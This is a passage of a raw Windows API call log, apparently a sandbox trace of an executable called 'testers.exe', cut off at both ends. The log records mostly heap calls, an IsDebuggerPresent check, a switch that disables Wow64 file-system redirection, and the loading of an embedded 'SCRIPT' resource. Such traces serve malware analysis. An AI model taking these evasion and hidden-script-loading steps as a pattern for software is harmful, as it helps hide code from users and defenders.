pcbRead=0x75f4f4*=0x0) returned 0x0 [0276.824] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x75f3f0 | out: lpSystemTimeAsFileTime=0x75f3f0*(dwLowDateTime=0x45bac970, dwHighDateTime=0x1d661be)) [0276.824] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8753f0 | out: hHeap=0x850000) returned 1 [0276.824] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x875400 | out: hHeap=0x850000) returned 1 [0276.825] CloseHandle (hObject=0xf8) returned 1 [0276.825] IUnknown:Release (This=0x876430) returned 0x0 [0276.825] FreeLibrary (hLibModule=0x290000) returned 1 [0276.825] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8622d0 | out: hHeap=0x850000) returned 1 [0276.825] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8753e0 | out: hHeap=0x850000) returned 1 [0276.825] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x863318 | out: hHeap=0x850000) returned 1 [0276.825] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x50) returned 0x87a680 [0276.825] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x863318 [0276.825] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x876430 [0276.825] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8753e0 [0276.825] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x876458 [0276.825] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x863348 [0276.825] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875400 [0276.825] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x863348 | out: hHeap=0x850000) returned 1 [0276.825] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x8764a8 [0276.825] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x863348 [0276.825] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x875870 [0276.825] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x876430 | out: hHeap=0x850000) returned 1 [0276.825] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8753e0 | out: hHeap=0x850000) returned 1 [0276.825] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a6f0 [0276.825] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8753e0 [0276.825] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a708 [0276.825] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8753f0 [0276.826] RtlSizeHeap (HeapHandle=0x850000, Flags=0x0, MemoryPointer=0x873138) returned 0x80 [0276.826] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x876430 [0276.826] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a720 [0276.826] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875410 [0276.826] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a738 [0276.826] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a6f0 | out: hHeap=0x850000) returned 1 [0276.826] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8753e0 | out: hHeap=0x850000) returned 1 [0276.826] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a6f0 [0276.826] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8753e0 [0276.826] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875420 [0276.826] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x214) returned 0x87aad8 [0276.826] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875430 [0276.826] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a750 [0276.826] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a6f0 | out: hHeap=0x850000) returned 1 [0276.826] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8753e0 | out: hHeap=0x850000) returned 1 [0276.826] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x863318 | out: hHeap=0x850000) returned 1 [0276.826] IsDebuggerPresent () returned 0 [0276.826] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x73fbb8, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0276.826] GetLongPathNameW (in: lpszShortPath="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpszLongPath=0x73fbb8, cchBuffer=0x7fff | out: lpszLongPath="C:\\Program Files (x86)\\Common Files\\testers.exe") returned 0x2f [0276.827] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a628 | out: hHeap=0x850000) returned 1 [0276.827] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x60) returned 0x87acf8 [0276.827] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x863318 [0276.827] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8753e0 [0276.827] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x73fb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x0) returned 0x2f [0276.827] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x863318 | out: hHeap=0x850000) returned 1 [0276.827] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x60) returned 0x87ad60 [0276.827] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x8764d0 [0276.827] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x863318 [0276.827] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x8764f8 [0276.827] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875440 [0276.827] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0276.827] GetProcAddress (hModule=0x75990000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x759bd650 [0276.827] Wow64DisableWow64FsRedirection (in: OldValue=0x74fb24 | out: OldValue=0x74fb24*=0x0) returned 1 [0276.827] FreeLibrary (hLibModule=0x75990000) returned 1 [0276.828] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe" (normalized: "c:\\program files (x86)\\common files\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x74f9c0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0276.828] GetFileType (hFile=0xf8) returned 0x1 [0276.828] LoadLibraryExW (lpLibFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0276.829] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0276.829] GetProcAddress (hModule=0x75990000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x759bd668 [0276.829] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0276.829] FreeLibrary (hLibModule=0x75990000) returned 1 [0276.829] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10000) returned 0x87adc8 [0276.829] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875450 [0276.829] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x74fb54 | out: ppstm=0x74fb54*=0x876520) returned 0x0 [0276.829] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358528 [0276.829] LoadResource (hModule=0x290000, hResInfo=0x358528) returned 0x3607b8 [0276.829] SizeofResource (hModule=0x290000, hResInfo=0x358528) returned 0x93fa [0276.829] LockResource (hResData=0x3607b8) returned 0x3607b8 [0276.829] ISequentialStream:RemoteWrite (in: This=0x876520, pv=0x3607b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0276.829] IStream:RemoteSeek (in: This=0x876520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0276.829] IStream:RemoteSeek (in: This=0x876520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0276.829] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x87adc8, cb=0x18, pcbRead=0x74faac | out: pv=0x87adc8*=0xa3, pcbRead=0x74faac*=0x18) returned 0x0 [0276.829] IStream:RemoteSeek (in: This=0x876520, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0276.829] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x74faf0, cb=0x4, pcbRead=0x74faac | out: pv=0x74faf0*=0x45, pcbRead=0x74faac*=0x4) returned 0x0 [0276.829] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x875450 | out: hHeap=0x850000) returned 1 [0276.829] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87adc8 | out: hHeap=0x850000) returned 1 [0276.830] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x74fb14, cb=0x10, pcbRead=0x74faec | out: pv=0x74fb14*=0x4d, pcbRead=0x74faec*=0x10) returned 0x0 [0276.830] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x74f9e8 | out: lpSystemTimeAsFileTime=0x74f9e8*(dwLowDateTime=0x45bac970, dwHighDateTime=0x1d661be)) [0276.830] IStream:RemoteSeek (in: This=0x876520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0276.830] IStream:RemoteSeek (in: This=0x876520, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0276.830] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x74f468, cb=0x4, pcbRead=0x74f22c | out: pv=0x74f468*=0x6b, pcbRead=0x74f22c*=0x4) returned 0x0 [0276.830] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x74f128 | out: lpSystemTimeAsFileTime=0x74f128*(dwLowDateTime=0x45bac970, dwHighDateTime=0x1d661be)) [0276.830] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x74f470, cb=0x4, pcbRead=0x74f22c | out: pv=0x74f470*=0xa6, pcbRead=0x74f22c*=0x4) returned 0x0 [0276.830] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x74f258, cb=0x34, pcbRead=0x74f22c | out: pv=0x74f258*=0xe1, pcbRead=0x74f22c*=0x34) returned 0x0 [0276.830] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x74f128 | out: lpSystemTimeAsFileTime=0x74f128*(dwLowDateTime=0x45bac970, dwHighDateTime=0x1d661be)) [0276.830] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x74f470, cb=0x4, pcbRead=0x74f22c | out: pv=0x74f470*=0x17, pcbRead=0x74f22c*=0x4) returned 0x0 [0276.830] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x74f49c, cb=0x6e, pcbRead=0x74f22c | out: pv=0x74f49c*=0xf9, pcbRead=0x74f22c*=0x6e) returned 0x0 [0276.830] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x74f128 | out: lpSystemTimeAsFileTime=0x74f128*(dwLowDateTime=0x45bac970, dwHighDateTime=0x1d661be)) [0276.830] IStream:RemoteSeek (in: This=0x876520, dlibMove=0x1, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0276.830] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x74f460, cb=0x4, pcbRead=0x74f22c | out: pv=0x74f460*=0xbc, pcbRead=0x74f22c*=0x4) returned 0x0 [0276.830] IStream:RemoteSeek (in: This=0x876520, dlibMove=0x18, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0276.830] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x74f468, cb=0x4, pcbRead=0x74f22c | out: pv=0x74f468*=0x6b, pcbRead=0x74f22c*=0x4) returned 0x0 [0276.830] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x74f128 | out: lpSystemTimeAsFileTime=0x74f128*(dwLowDateTime=0x45bac970, dwHighDateTime=0x1d661be)) [0276.830] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x74f470, cb=0x4, pcbRead=0x74f22c | out: pv=0x74f470*=0xaf, pcbRead=0x74f22c*=0x4) returned 0x0 [0276.830] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x74f258, cb=0x26, pcbRead=0x74f22c | out: pv=0x74f258*=0xe6, pcbRead=0x74f22c*=0x26) returned 0x0 [0276.830] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x74f128 | out: lpSystemTimeAsFileTime=0x74f128*(dwLowDateTime=0x45bac970, dwHighDateTime=0x1d661be)) [0276.830] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x74f470, cb=0x4, pcbRead=0x74f22c | out: pv=0x74f470*=0x1b, pcbRead=0x74f22c*=0x4) returned 0x0 [0276.830] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x74f49c, cb=0x76, pcbRead=0x74f22c | out: pv=0x74f49c*=0x6b, pcbRead=0x74f22c*=0x76) returned 0x0 [0276.830] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x74f128 | out: lpSystemTimeAsFileTime=0x74f128*(dwLowDateTime=0x45bac970, dwHighDateTime=0x1d661be)) [0276.830] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x74fb23, cb=0x1, pcbRead=0x74f474 | out: pv=0x74fb23*=0x1, pcbRead=0x74f474*=0x1) returned 0x0 [0276.830] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x74fb1c, cb=0x4, pcbRead=0x74f474 | out: pv=0x74fb1c*=0x86, pcbRead=0x74f474*=0x4) returned 0x0 [0276.830] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x74fb1c, cb=0x4, pcbRead=0x74f474 | out: pv=0x74fb1c*=0xe4, pcbRead=0x74f474*=0x4) returned 0x0 [0276.830] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x74fb1c, cb=0x4, pcbRead=0x74f474 | out: pv=0x74fb1c*=0x48, pcbRead=0x74f474*=0x4) returned 0x0 [0276.830] IStream:RemoteSeek (in: This=0x876520, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0276.832] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x27c58) returned 0x8941e0 [0276.832] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x923a) returned 0x87adc8 [0276.832] ISequentialStream:RemoteRead (in: This=0x876520, pv=0x87adc8, cb=0x923a, pcbRead=0x74f474 | out: pv=0x87adc8*=0x6d, pcbRead=0x74f474*=0x923a) returned 0x0 [0276.832] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x74f370 | out: lpSystemTimeAsFileTime=0x74f370*(dwLowDateTime=0x45bd2ad0, dwHighDateTime=0x1d661be)) [0276.834] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20000) returned 0x8bbe40 [0276.834] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10000) returned 0x8dbe48 [0276.835] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10000) returned 0x8ebe50 [0276.840] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8bbe40 | out: hHeap=0x850000) returned 1 [0276.840] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8dbe48 | out: hHeap=0x850000) returned 1 [0276.840] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8ebe50 | out: hHeap=0x850000) returned 1 [0276.840] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87adc8 | out: hHeap=0x850000) returned 1 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x82e4) returned 0x87adc8 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x1c) returned 0x876570 [0276.840] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x876570 | out: hHeap=0x850000) returned 1 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x876570 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a6f0 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x876598 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a768 [0276.840] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a6f0 | out: hHeap=0x850000) returned 1 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xa) returned 0x87a6f0 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a780 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875450 [0276.840] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a780 | out: hHeap=0x850000) returned 1 [0276.840] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x875450 | out: hHeap=0x850000) returned 1 [0276.840] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a6f0 | out: hHeap=0x850000) returned 1 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a6f0 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x1e) returned 0x8765c0 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a780 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x8765e8 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875450 [0276.840] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8765c0 | out: hHeap=0x850000) returned 1 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a798 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a7b0 [0276.840] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a780 | out: hHeap=0x850000) returned 1 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a780 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a7c8 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a7e0 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a7f8 [0276.840] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875460 [0276.840] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a7c8 | out: hHeap=0x850000) returned 1 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a7c8 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a810 [0276.841] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a7e0 | out: hHeap=0x850000) returned 1 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a7e0 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a828 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a840 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a858 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875470 [0276.841] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a828 | out: hHeap=0x850000) returned 1 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a828 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a870 [0276.841] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a840 | out: hHeap=0x850000) returned 1 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a840 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875480 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a888 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a8a0 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8830d0 [0276.841] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x875480 | out: hHeap=0x850000) returned 1 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a8b8 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a8d0 [0276.841] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a888 | out: hHeap=0x850000) returned 1 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x40) returned 0x8622d0 [0276.841] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x876570 | out: hHeap=0x850000) returned 1 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a888 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x12) returned 0x87a628 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a8e8 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x876570 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x875480 [0276.841] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a628 | out: hHeap=0x850000) returned 1 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a900 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a918 [0276.841] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a8e8 | out: hHeap=0x850000) returned 1 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a8e8 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xa) returned 0x87a930 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a948 [0276.841] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8830e0 [0276.841] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a948 | out: hHeap=0x850000) returned 1 [0276.841] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8830e0 | out: hHeap=0x850000) returned 1 [0276.842] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a930 | out: hHeap=0x850000) returned 1 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a930 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a948 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xe) returned 0x87a960 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a978 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a990 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8830e0 [0276.842] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a960 | out: hHeap=0x850000) returned 1 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a960 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87a9a8 [0276.842] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a978 | out: hHeap=0x850000) returned 1 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a978 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a9c0 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x80) returned 0x8834b8 [0276.842] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8622d0 | out: hHeap=0x850000) returned 1 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a9d8 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a9f0 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87aa08 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87aa20 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8830f0 [0276.842] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a9f0 | out: hHeap=0x850000) returned 1 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87a9f0 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87aa38 [0276.842] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87aa08 | out: hHeap=0x850000) returned 1 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87aa08 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87aa50 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87aa68 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xe) returned 0x87aa80 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87aa98 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x87aab0 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x883100 [0276.842] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87aa80 | out: hHeap=0x850000) returned 1 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87aa80 [0276.842] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883558 [0276.842] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87aa98 | out: hHeap=0x850000) returned 1 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x87aa98 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883570 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883588 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x14) returned 0x87a628 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8835a0 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x8765c0 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x883110 [0276.843] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a628 | out: hHeap=0x850000) returned 1 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8835b8 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8835d0 [0276.843] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8835a0 | out: hHeap=0x850000) returned 1 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8835a0 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8835e8 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, 